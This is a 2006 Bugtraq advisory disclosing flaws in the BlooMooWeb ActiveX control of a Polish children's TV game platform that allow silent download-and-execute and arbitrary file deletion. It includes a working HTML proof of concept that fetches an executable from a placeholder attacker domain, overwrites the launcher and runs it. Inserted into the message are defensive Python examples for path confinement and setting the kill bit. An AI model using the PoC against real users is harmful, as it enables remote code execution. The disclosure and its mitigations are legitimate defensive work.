Message-ID: <20061031002815.29461.qmail@securityfocus.com>
Date: 31 Oct 2006 00:28:15 -0000
From: maxgipeh@...oo.com
To: bugtraq@...urityfocus.com
Subject: ActiveX security leaks in the TV owned web game platform
There is a security problem in the architecture and design
of the BlooMooWeb ActiveX control.
BlooMooWeb is an internet game platform for kids, popular mainly
in Poland. It has been provided for the TV programme
"Krolestwo Maciusia" ("The Kingdom of Macius")
broadcast on TVP1, the first channel of Polish public television.
The flaws allow any malicious person who induces the
remote user to click a specified link to
silently download and immediately execute
any attacker-supplied code in the current user's context.
Technical description:
The BlooMooWeb ActiveX control, using the CLSID identifier
CLSID: 22E9EFBA-114C-4DA0-AE72-D8F2C7138002,
is used by the web platform to download and install the game
system files and later to download and install particular games.
After the game system is installed (installation of the ActiveX control has
been approved, and the BlooMooWeb platform has been downloaded and installed),
the game system binaries and data are stored in the following directory:
C:/Program Files/AidemMedia/BlooMooWeb
and the default launch path is set to that directory.
The following 3 methods, exposed to the scripting layer for the
data download / installation process, are particularly interesting:
BW_DownloadFile(BSTR bstrUrl, BSTR bstrLocalFile,BSTR bstrCallback)
BW_LaunchGame(BSTR bstrParams)
BW_DeleteTempFile(BSTR filePath)
First of all it has to be said that the control implementation has
no protection that would distinguish between the game platform
data area and the user's system data area.
Therefore any path parameter passed to the control's methods can point anywhere
outside the local installation directory on the user's hard drive.
The BW_DownloadFile() method, using non-blocking streaming with a callback
system, downloads a remote file specified by the URL string bstrUrl parameter,
streaming it down with overwrite IO permission to the file
pointed to by the bstrLocalFile parameter.
The third parameter is a callback function pointer which can be used to
track the download progress visually (GUI) or silently.
A call to the BW_LaunchGame method with any
string argument results in execution of the
%BlooMooWebDirectory%/BlooMooWeb.exe
binary (the game platform core executable)
and the spawning of a new process in the current user context.
Since the control has only a callback system and no GUI,
it is a simple matter to execute it silently with no user interaction or signaling.
Furthermore, having full scripting access to a method that downloads
any data (including binaries) with overwrite IO permission,
with no user interaction, to any directory on the
user's physical disk, it can be used to overwrite the default
game-launcher binary BlooMooWeb.exe with an attacker-chosen file.
After that, any single call to BW_LaunchGame() will spawn a new process from
the attacker-supplied binary file.
Simplifying: with just one click by the user on the attacker-provided link,
attacker-supplied executable code (containing a trojan horse,
virus, spyware, adware, etc.)
can be downloaded silently and instantly executed with the user's account privileges.
A DoS-type attack vector is introduced by the BW_DeleteTempFile() method,
which is not confined to the internal ActiveX installer system
but is available externally for scripting.
It is used by the game installer engine to delete files after game
deinstallation and for other cleanup purposes.
It takes a single string argument, which can point to ANY file on the user's physical disk.
That introduces another "creepy" scenario in which
a user induced by the malicious attacker to visit an attacker-controlled site
can, with a single click on a link, wipe any
data from their own disk, including operating system core files, leading to an OS crash.
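The missing check behind both the download/overwrite issue and the BW_DeleteTempFile() issue described above is path confinement: every scripted path should be resolved and rejected unless it stays inside the control's own data area, and the launcher binary should never be a valid download target. The following is an added example written for this page, not Aidem Media's code: it models the three operations with a temporary directory standing in for C:/Program Files/AidemMedia/BlooMooWeb, constructed bytes instead of a network download, and an assumed "temp" subdirectory as the only place deletions are permitted. Function names and the subdirectory are assumptions.

```python
"""
Added example (not Aidem Media's code): path confinement for file paths that a
scripting-accessible control receives. The install directory is a temporary
directory created for the demo; the launcher name comes from the advisory;
the "temp" subdirectory and all function names are assumptions.
"""
import os
import tempfile

# Stand-in for the control's installation directory (constructed for the demo).
INSTALL_DIR = tempfile.mkdtemp(prefix="bloomooweb_demo_")
LAUNCHER_NAME = "BlooMooWeb.exe"   # launcher binary named in the advisory
TEMP_SUBDIR = "temp"               # assumed: the only place deletions are allowed


class PathNotAllowed(ValueError):
    """Raised when a scripted path would leave the allowed area."""


def confine_path(root, requested):
    """Resolve `requested` against `root`; return it only if it stays inside root.

    An absolute `requested` makes os.path.join discard `root`, and ".."
    components are collapsed by realpath, so both escapes show up as a
    candidate whose common prefix with `root` is not `root` itself.
    """
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, requested))
    try:
        inside = os.path.commonpath([root_real, candidate]) == root_real
    except ValueError:           # different drives on Windows
        inside = False
    if not inside or candidate == root_real:
        raise PathNotAllowed("path %r escapes %r" % (requested, root_real))
    return candidate


def is_confined(root, requested):
    """Boolean form of confine_path for callers that prefer a check to an exception."""
    try:
        confine_path(root, requested)
        return True
    except PathNotAllowed:
        return False


def can_write(root, requested):
    """A download target must be inside root and must never be the launcher.

    The comparison is made on the resolved path (so "BlooMooWeb.exe/" or
    "games/../BlooMooWeb.exe" cannot slip past) and case-insensitively,
    because Windows treats BlooMooWEB.exe and BlooMooWeb.exe as one file.
    """
    try:
        target = confine_path(root, requested)
    except PathNotAllowed:
        return False
    return os.path.basename(target).lower() != LAUNCHER_NAME.lower()


def store_download(root, requested, data):
    """Hardened counterpart of writing downloaded bytes to bstrLocalFile."""
    if not can_write(root, requested):
        raise PathNotAllowed("refusing to write %r" % requested)
    path = confine_path(root, requested)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def delete_temp_file(root, requested):
    """Hardened counterpart of BW_DeleteTempFile: only files under root/temp.

    Returns True if a file was removed, False if nothing was there; an
    escape attempt raises PathNotAllowed instead of touching anything.
    """
    temp_root = os.path.join(root, TEMP_SUBDIR)
    os.makedirs(temp_root, exist_ok=True)
    path = confine_path(temp_root, requested)
    if not os.path.isfile(path):
        return False
    os.remove(path)
    return True


if __name__ == "__main__":
    # Constructed inputs: a legitimate game file, two launcher-overwrite
    # attempts, a traversal attempt, and a temp-file cleanup.
    print("stored:", store_download(INSTALL_DIR, "games/level1.dat", b"constructed game data"))
    for name in ("BlooMooWEB.exe", "games/../BlooMooWeb.exe", "../../outside.exe"):
        print(name, "->", "allowed" if can_write(INSTALL_DIR, name) else "rejected")
    store_download(INSTALL_DIR, "temp/cache.bin", b"constructed cache")
    print("deleted cache.bin:", delete_temp_file(INSTALL_DIR, "cache.bin"))
    try:
        delete_temp_file(INSTALL_DIR, "../games/level1.dat")
    except PathNotAllowed as exc:
        print("delete rejected:", exc)
```

The two rules together close both vectors from the advisory: a download can no longer land outside the data area or replace the binary that BW_LaunchGame() runs, and a cleanup call can no longer reach files outside the control's own temp area.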
Concluding:
The BlooMooWeb web game platform was designed
by the gaming company and TV producer Aidem Media and launched in January 2006
as part of the Polish public television show for kids "Krolestwo Maciusia".
Since then it has gained over 12000 registered forum users, with web chat,
forums and ICQ/GG messaging protocol identity tracking.
Excluding the users who have reinstalled their operating systems or changed
the ActiveX security policy of their
browser since the game platform installation, it can be expected
that this web game system is widespread and has a rather large audience,
in and outside Poland.
Taking into consideration that a TV-supported / owned game platform
makes itself trustworthy enough for users to approve the ActiveX control installation,
the origin of the flaw in this software could be interpreted in two ways:
as an accidental security vulnerability resulting from bad architecture design,
or as a backdoor into platform users' machines, "accidentally" built in by the vendor.
Affected software:
Windows 98 SE
Windows 2000 SP4
Windows XP pro SP2
Windows 2003 Server Standard SP1
BlooMooWeb ActiveX CTL v1.0.9
Example PoC exploit showing remote execution of attacker-supplied binary code:
<html>
<head>
<script language="JavaScript">
// binary that replaces the launcher, hosted on the attacker-controlled domain from the scenario above
var binaryUrl="http://some_attacker_controlled_domain/attackerfile.exe";
function spawn2()
{
  // target path = installation dir + launcher name; the control applies no path confinement
  aa1=o2obj.GetInstallationDir(null);
  aa2="BlooMooWEB.exe";
  o2obj.BW_DownloadFile(binaryUrl,aa1+aa2,"callback001");
}
function callback001( msgCode, param1, param2, param3 )
{
  // completion is reported through the named callback; the overwritten launcher is then run
  if(msgCode == 'DOWNLOAD_COMPLETE' )
  {
    o2obj.BW_LaunchGame("treleferekuku");
  }
}
</script>
</head>
<body onload="spawn2()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
CLASSID="CLSID:22E9EFBA-114C-4DA0-AE72-D8F2C7138002">
</object>
</body>
</html>
Solution:
-removal of the BlooMooWeb ActiveX control binary, located in:
%WindowsDirectory%/downloaded program files/AidemATL.dll
-turning off ActiveX entirely in the browser settings (or switching the browser to a non-Microsoft one and forgetting about MS suicidal inventions)
-thinking twice before approving installation of any ActiveX-driven software, whether unsigned or signed by a widespread "big corp"
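Beyond removing the DLL or disabling ActiveX altogether, the targeted mitigation for one vulnerable control is Internet Explorer's "kill bit": a Compatibility Flags DWORD with bit 0x400 set under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}, which stops IE from instantiating that CLSID even while the binary is still on disk. The following is an added example written for this page, not Aidem Media's or Microsoft's code; it uses the CLSID quoted in the advisory, Microsoft's documented registry location and flag value, and helper names that are assumptions. Only the two registry functions need Windows; the CLSID handling runs anywhere.

```python
"""
Added example (not Aidem Media's or Microsoft's code): set and read the IE
kill bit for the BlooMooWeb control's CLSID. The registry path and the 0x400
flag are Microsoft's documented kill-bit mechanism; function names are
assumptions made here.
"""
import re
import sys

# CLSID quoted in the advisory above.
BLOOMOOWEB_CLSID = "22E9EFBA-114C-4DA0-AE72-D8F2C7138002"
COMPAT_BASE = r"SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
# 32-bit IE on 64-bit Windows reads the kill bit from the Wow6432Node view.
COMPAT_BASE_WOW64 = r"SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility"
VALUE_NAME = "Compatibility Flags"
KILL_BIT = 0x400                   # bit that blocks instantiation of the control

_CLSID_RE = re.compile(r"^\{?([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}?$")


def normalize_clsid(clsid):
    """Accept the CLSID with or without braces, any case; return the {UPPER} form."""
    m = _CLSID_RE.match(clsid.strip())
    if not m:
        raise ValueError("not a CLSID: %r" % clsid)
    return "{%s}" % m.group(1).upper()


def killbit_subkey(clsid, wow64=False):
    """Registry subkey under HKLM where the kill bit for this control lives."""
    base = COMPAT_BASE_WOW64 if wow64 else COMPAT_BASE
    return base + "\\" + normalize_clsid(clsid)


def has_killbit(flags):
    """True if a Compatibility Flags DWORD has the kill bit set."""
    return bool(flags & KILL_BIT)


def read_flags(clsid, wow64=False):
    """Current Compatibility Flags for the control, or 0 if unset (Windows only)."""
    import winreg
    subkey = killbit_subkey(clsid, wow64)
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey, 0, winreg.KEY_READ) as key:
            value, _type = winreg.QueryValueEx(key, VALUE_NAME)
            return int(value)
    except FileNotFoundError:      # key or value absent: no flags set
        return 0


def set_killbit(clsid, wow64=False):
    """OR the kill bit into Compatibility Flags, keeping any other flags.

    Windows only; writing under HKLM requires an administrative token.
    """
    import winreg
    flags = read_flags(clsid, wow64) | KILL_BIT
    subkey = killbit_subkey(clsid, wow64)
    with winreg.CreateKeyEx(winreg.HKEY_LOCAL_MACHINE, subkey, 0, winreg.KEY_SET_VALUE) as key:
        winreg.SetValueEx(key, VALUE_NAME, 0, winreg.REG_DWORD, flags)
    return flags


if __name__ == "__main__":
    print("kill-bit key:", killbit_subkey(BLOOMOOWEB_CLSID))
    if sys.platform == "win32":
        print("before:", hex(read_flags(BLOOMOOWEB_CLSID)))
        print("after: ", hex(set_killbit(BLOOMOOWEB_CLSID)))
        print("kill bit set:", has_killbit(read_flags(BLOOMOOWEB_CLSID)))
    else:
        print("not on Windows; registry step skipped")
```

The kill bit is independent of the DLL removal step above: a reinstalled or re-downloaded control with the same CLSID stays blocked, which is why it is the check to verify on machines where the platform may have been installed.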
Links:
"The Kingdom of Macius" TV show official web page:
http://www.krolestwomaciusia.pl
BlooMooWeb game portal:
http://www.krolestwomaciusia.pl/bweb_aktualnosci.php
Polish public television main web page:
http://www.tvp.pl
information provided by Max Gipehtykrop of German Reverse Force
maxgipeh@...oo.com